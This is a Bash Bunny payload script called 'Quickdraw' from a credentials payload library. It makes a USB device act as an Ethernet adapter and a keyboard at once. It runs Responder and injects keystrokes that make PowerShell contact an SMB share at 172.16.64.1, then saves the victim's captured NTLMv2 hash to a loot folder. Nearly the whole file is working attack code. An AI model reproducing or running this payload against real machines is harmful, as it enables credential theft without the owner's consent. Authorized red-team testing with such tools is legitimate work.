bashbunny-payloads/payloads/library/credentials/Quickdraw/payload.txt

#!/bin/bash
#
# Title:         Quickdraw
# Author:        golem445
# Version:       1.0
# Dependencies:  Responder
# Runtime:		 ~8 seconds
#
# Sets up Ethernet and HID keyboard interfaces simultaneously,
# runs Responder, then uses HID to generate an NTLMv2 hash
# response from the target computer.

# Prereq check
REQUIRETOOL responder

# Begin attack setup
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET TARGET_HOSTNAME
LOOTDIR=/root/udisk/loot/quickdraw

# Prep loot logging
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $LOOTDIR/$HOST-$COUNT
cd /tools/responder/
rm logs/*

# Begin Responder
LED ATTACK
python Responder.py -I usb0 -wfvr &

## Start HID Attack
sleep 1
RUN WIN cmd
Q DELAY 250
Q STRING "powershell \\\\172.16.64.1\\s"
Q ENTER
Q STRING "exit"
Q ENTER

# Wait for NTLMv2 capture to complete
LED STAGE2
until [ -f logs/*NTLM* ]
do
     sleep 1
done

# copy logs to loot directory
cp logs/* $LOOTDIR/$HOST-$COUNT

# Sync the file system
sync

## Finished
LED FINISH